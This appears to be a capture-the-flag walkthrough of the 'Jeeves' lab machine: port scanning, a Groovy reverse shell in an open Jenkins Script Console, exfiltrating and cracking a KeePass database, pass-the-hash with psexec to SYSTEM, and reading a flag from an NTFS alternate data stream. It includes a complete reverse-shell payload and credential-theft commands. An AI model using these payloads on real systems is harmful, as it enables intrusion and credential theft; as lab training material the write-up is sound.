# Jeeves

<figure><img src="/files/vhTtC5Nw1RVYovGyKdRA" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions behind them.

The following nmap command scans the whole port range quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.63 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` skip host discovery and treat the host as **online** (Windows hosts often drop the ping probes).
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the `allPorts` file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Sat Nov  5 12:46:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.051s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

# Nmap done at Sat Nov  5 12:47:21 2022 -- 1 IP address (1 host up) scanned in 39.67 seconds
```

{% endcode %}

Now that we know which ports are open, let's identify the services and versions running on them. The following command probes these ports in more depth and saves the result to a file:

> nmap -sC -sV -p80,135,445,50000 10.10.10.63 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the `targeted` file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Sat Nov  5 12:49:06 2022 as: nmap -sCV -p80,135,445,50000 -oN targeted 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.039s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-05T16:49:23
|_  start_date: 2022-11-05T16:45:35
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h00m03s, deviation: 0s, median: 5h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  5 12:49:56 2022 -- 1 IP address (1 host up) scanned in 50.03 seconds
```

{% endcode %}

The website on port *80* is a static search-engine-style page that doesn't offer much.

<figure><img src="/files/LJwRM5ISIipHXBfMKpnd" alt=""><figcaption></figcaption></figure>

And port *50000* answers with a bare *Jetty 9.4.z* error page (`404 Not Found` at the root), so whatever runs there lives under another path.

<figure><img src="/files/650YsweTSTBN8B7jb9lF" alt=""><figcaption></figcaption></figure>

If we enumerate subdirectories with *gobuster* on this last website, we'll find the `/askjeeves` directory.

> gobuster dir -u <http://10.10.10.63:50000/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/06 22:03:07 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

===============================================================
2022/11/06 22:03:48 Finished
===============================================================
```

## Exploitation

In the `/askjeeves` directory, we'll find a *Jenkins* server.

<figure><img src="/files/hred0fi3iuxGo3ZuNNQX" alt=""><figcaption></figcaption></figure>

In a *Jenkins* server, if we can reach the `Manage Jenkins` section (here without authenticating), the `Script Console` under it executes arbitrary Groovy with the privileges of the Jenkins service account, which amounts to command execution on the host.

<figure><img src="/files/LMydkeS6rMHIc0KWZXhS" alt=""><figcaption></figcaption></figure>

All we have to do is start a *netcat* listener on port *4444*, wrapped in *rlwrap* so the Windows shell gets line editing and history.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And paste the following Groovy script into the Script Console; it spawns `cmd.exe` and pipes it to our netcat listener.

```groovy
// Groovy reverse shell for the Jenkins Script Console (runs as the Jenkins service account)
String host="10.10.14.6";   // attacker IP
int port=4444;              // listener port
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump process output to the socket and socket input to the process until either side closes
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}}
p.destroy();s.close();
```

<figure><img src="/files/q1ka9F3TD3bR8svSHfWT" alt=""><figcaption></figcaption></figure>

Once we get the shell, we can grab the user flag. Note that it runs as `jeeves\kohsuke`, the account the Jenkins service runs under, even though its working directory sits in the Administrator profile.

```
Listening on 0.0.0.0 4444
Connection received on 10.10.10.63 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins>type \users\kohsuke\desktop\user.txt
e3232272596fb47950d59c4cf1e7066a
```

## Privilege Escalation

Inside `kohsuke`'s Documents directory we'll find a `CEH.kdbx` file.

> dir \users\kohsuke\documents

```
dir \users\kohsuke\documents
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\users\kohsuke\documents

11/03/2017  10:18 PM    <DIR>          .
11/03/2017  10:18 PM    <DIR>          ..
09/18/2017  12:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   2,664,460,288 bytes free
```

The `.kdbx` extension belongs to *KeePass* 2 databases, which usually hold usernames and passwords.

{% hint style="info" %}
**KeePass** is a password manager that keeps its entries in a database encrypted under a master key; it is a Windows application that officially supports macOS and Linux through Mono.
{% endhint %}

Let's transfer that file to our machine. First, create an *SMB* share of the current directory with Impacket:

> impacket-smbserver smbFolder $(pwd) -smb2support

Then copy the file to the *SMB* share.

> `copy \users\kohsuke\documents\CEH.kdbx \\10.10.14.6\smbFolder\`

Such databases are encrypted under a master password, so we'll have to crack it. First, extract the crackable material with *keepass2john* (the header's seeds, IV and round count plus the first ciphertext block, rather than a digest of the password) and save it in the `hash` file.

> keepass2john CEH.kdbx > hash

Now crack it with *john* and the *rockyou* wordlist. The 6000 reported as "Cost 1" is the AES-KDF round count: each candidate costs that many AES operations, which is why the rate stays at a few hundred candidates per second.

> john --wordlist=/usr/share/wordlists/rockyou.txt hash

```
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:03:21 DONE (2022-11-06 22:34) 0.004956g/s 272.5p/s 272.5c/s 272.5C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
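What keepass2john hands to john is not a hash of the password but the unencrypted KDBX header: master seed, transform seed, AES-KDF round count, IV and the expected start bytes, followed by the first ciphertext block. A candidate password is tested by deriving the key from those fields and checking whether the decrypted start bytes match. The Python below is an added example, not from the write-up or from the KeePass or john projects: it parses exactly those fields from a KDBX 3.x file so you can read the cost before committing to a crack. The sample database it builds is constructed with random seeds and holds no real data; the cipher UUIDs are the ones KeePass publishes for AES, ChaCha20 and Twofish.

```python
"""Parse the unencrypted header of a KeePass 2 (KDBX 3.x) database.

Added example, not part of the original write-up. It reads the header fields
that keepass2john serialises for john, so the key-derivation cost ("Cost 1")
and cipher ("Cost 3") are visible before cracking. build_sample_kdbx() makes
a constructed database with random seeds; it is test data, not CEH.kdbx.
"""
import os
import struct

SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67          # KDBX magic, two little-endian uint32s
CIPHER_IDS = {                               # CipherID header field -> cipher name
    bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"): "AES-256",
    bytes.fromhex("d6038a2b8b6f4cb5a524339a31dbb59a"): "ChaCha20",
    bytes.fromhex("ad68f29f576f4bb9a36ad47af965346c"): "Twofish",
}
# Header field ids used by KDBX 3.x (field = 1-byte id, 2-byte little-endian length, data)
END, CIPHER, COMPRESSION, MASTER_SEED, TRANSFORM_SEED, ROUNDS, IV, STREAM_KEY, START_BYTES = 0, 2, 3, 4, 5, 6, 7, 8, 9


def parse_kdbx_header(blob):
    """Return the header fields that define the key-derivation cost and the crack check."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX file")
    if major != 3:
        # KDBX 4 uses 4-byte field lengths and a KdfParameters field (Argon2), a different layout
        raise ValueError(f"KDBX {major}.{minor}: unsupported header layout")
    fields, pos = {}, 12
    while True:
        if pos + 3 > len(blob):
            raise ValueError("truncated header")
        fid, size = struct.unpack_from("<BH", blob, pos)
        data = blob[pos + 3:pos + 3 + size]
        pos += 3 + size
        if fid == END:
            break
        fields[fid] = data
    return {
        "version": f"{major}.{minor}",
        "cipher": CIPHER_IDS.get(fields[CIPHER], "unknown"),
        "rounds": struct.unpack("<Q", fields[ROUNDS])[0],      # AES-KDF iterations per candidate
        "master_seed": fields[MASTER_SEED].hex(),
        "transform_seed": fields[TRANSFORM_SEED].hex(),        # AES key used to transform the composite key
        "iv": fields[IV].hex(),
        "expected_start_bytes": fields[START_BYTES].hex(),     # first 32 plaintext bytes must equal this
        "first_block": blob[pos:pos + 32].hex(),               # first ciphertext block: the crack oracle
        "data_offset": pos,                                    # where the encrypted payload begins
    }


def build_sample_kdbx(rounds=6000):
    """Construct a KDBX 3.1 header with random seeds and a dummy payload (test data only)."""
    def field(fid, data):
        return struct.pack("<BH", fid, len(data)) + data
    hdr = struct.pack("<IIHH", SIG1, SIG2, 1, 3)             # version 3.1: minor=1, major=3
    hdr += field(CIPHER, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))
    hdr += field(COMPRESSION, struct.pack("<I", 1))          # 1 = gzip
    hdr += field(MASTER_SEED, os.urandom(32))
    hdr += field(TRANSFORM_SEED, os.urandom(32))
    hdr += field(ROUNDS, struct.pack("<Q", rounds))
    hdr += field(IV, os.urandom(16))
    hdr += field(STREAM_KEY, os.urandom(32))
    hdr += field(START_BYTES, os.urandom(32))
    hdr += field(END, b"\r\n\r\n")
    return hdr + os.urandom(64)                              # stand-in for the encrypted payload


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_kdbx()
    for key, value in parse_kdbx_header(blob).items():
        print(f"{key:>22}: {value}")
```

Run it as `python kdbx_header.py CEH.kdbx` on the real file. The round count is the only knob that changes the attacker's cost: a database with 6000 rounds at a few hundred candidates per second gets through rockyou in hours, which is the practical reason to raise the KDF work factor (or move to KDBX 4 with Argon2) on any database that leaves the owner's machine.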

Now that we know the password, we can open the `CEH.kdbx` file.

> keepassxc CEH.kdbx

<figure><img src="/files/YNMH5Ezd1Ci4OylIIaB5" alt=""><figcaption></figcaption></figure>

Inside the `Backup stuff` entry, the password field holds what looks like an NTLM hash (32 hex characters) rather than a password.

<figure><img src="/files/C4MBXNcvyPFwuQFvTwgl" alt=""><figcaption></figcaption></figure>

It seems to be the NTLM hash of the `administrator` user; we can confirm that with *CrackMapExec* by authenticating over SMB with the hash instead of a password.

> cme smb 10.10.10.63 -u "administrator" -H e0fb1fb85756c24235ff238cbe81fe00

```
SMB         10.10.10.63     445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.10.10.63     445    JEEVES           [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)
```

As we have the NTLM hash of the `administrator` user, we don't need the cleartext password to get a shell: NTLM authentication only ever needs the hash, so a *Pass The Hash* attack with Impacket's psexec works directly. Keep in mind that psexec uploads a service binary to `ADMIN$` and creates a service, so it requires local admin and leaves service-creation events on the target.

> psexec.py administrator\@10.10.10.63 -hashes :e0fb1fb85756c24235ff238cbe81fe00

```
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file glmGVnZp.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service dMpa on 10.10.10.63.....
[*] Starting service dMpa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

At this point we'd expect the root flag, but the administrator's desktop holds a file called `hm.txt` instead.

> dir \users\administrator\desktop

```
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\users\administrator\desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,663,813,120 bytes free
```

The file tells us to *look deeper*.

> type \users\administrator\desktop\hm.txt

```
The flag is elsewhere.  Look deeper.
```

If we go to the desktop and list the files with their alternate data streams (`dir /r`), we'll see one called `hm.txt:root.txt`.

{% hint style="info" %}
**Alternate Data Streams** are extra named data forks that NTFS can attach to a file. They don't change the file's reported size or its normal content, so plain `dir` and `type` never reveal them.
{% endhint %}
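The write-up shows the result but not the enumeration; the Python below is an added example (not from the write-up) that does it two ways. On Windows it calls `FindFirstStreamW`/`FindNextStreamW` from kernel32, the API behind `dir /r` and PowerShell's `Get-Item -Stream *`; anywhere else it parses a saved `dir /r` listing so notes taken on the box can be triaged offline. `SAMPLE_DIR_R` is a constructed listing shaped like the administrator's desktop on Jeeves, with an assumed 34-byte stream size.

```python
"""Enumerate NTFS alternate data streams, on the box or from saved `dir /r` output.

Added example, not part of the original write-up. list_streams() needs
Windows (ctypes + kernel32); parse_dir_r() works anywhere. SAMPLE_DIR_R is
constructed test data modelled on the Jeeves desktop listing.
"""
import ctypes
import re
import sys

MAX_PATH = 260


class WIN32_FIND_STREAM_DATA(ctypes.Structure):
    _fields_ = [("StreamSize", ctypes.c_longlong),                  # LARGE_INTEGER
                ("cStreamName", ctypes.c_wchar * (MAX_PATH + 36))]   # ":name:$DATA"


def list_streams(path):
    """Return [(stream_name, size)] for `path`; "::$DATA" is the ordinary file content."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)              # Windows only
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_uint32]
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindClose.argtypes = [ctypes.c_void_p]
    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)     # 0 = FindStreamInfoStandard
    if handle in (None, ctypes.c_void_p(-1).value):                   # INVALID_HANDLE_VALUE
        raise ctypes.WinError(ctypes.get_last_error())
    streams = []
    try:
        while True:
            streams.append((data.cStreamName, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                break
    finally:
        k32.FindClose(handle)
    return streams


def read_stream(path, stream):
    """Read one stream by its full name, e.g. read_stream("hm.txt", "root.txt") opens hm.txt:root.txt."""
    with open(f"{path}:{stream}", "rb") as f:   # same trick as `more < hm.txt:root.txt`
        return f.read()


# `dir /r` prints each stream under its file, indented, as "<size> <file>:<stream>:$DATA"
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

SAMPLE_DIR_R = """\
 Directory of C:\\users\\administrator\\desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
"""


def parse_dir_r(listing):
    """Return [(file, stream, size)] for every alternate stream in saved `dir /r` output."""
    found = []
    for line in listing.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            found.append((m.group(2), m.group(3), int(m.group(1).replace(",", ""))))
    return found


if __name__ == "__main__":
    if sys.platform == "win32" and len(sys.argv) > 1:
        for name, size in list_streams(sys.argv[1]):
            print(f"{size:>8}  {sys.argv[1]}{name}")
    else:
        for file, stream, size in parse_dir_r(SAMPLE_DIR_R):
            print(f"{file} has hidden stream {stream!r} ({size} bytes)")
```

On the box, `python ads.py C:\Users\Administrator\Desktop\hm.txt` prints `::$DATA` (36 bytes) and `:root.txt:$DATA`, and `read_stream` fetches the latter. For forensics the same enumeration over a whole directory tree is the quick way to find payloads or loot stashed in streams, since no size or content change is visible from the ordinary file.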

Finally, all we have to do is read the content of the alternate data stream and take the root flag; redirecting the stream into `more` works where `type` refuses to open a `file:stream` path.

> more < hm.txt:root.txt

```
afbc5bd4b615a60648cec41c6ac92530
```

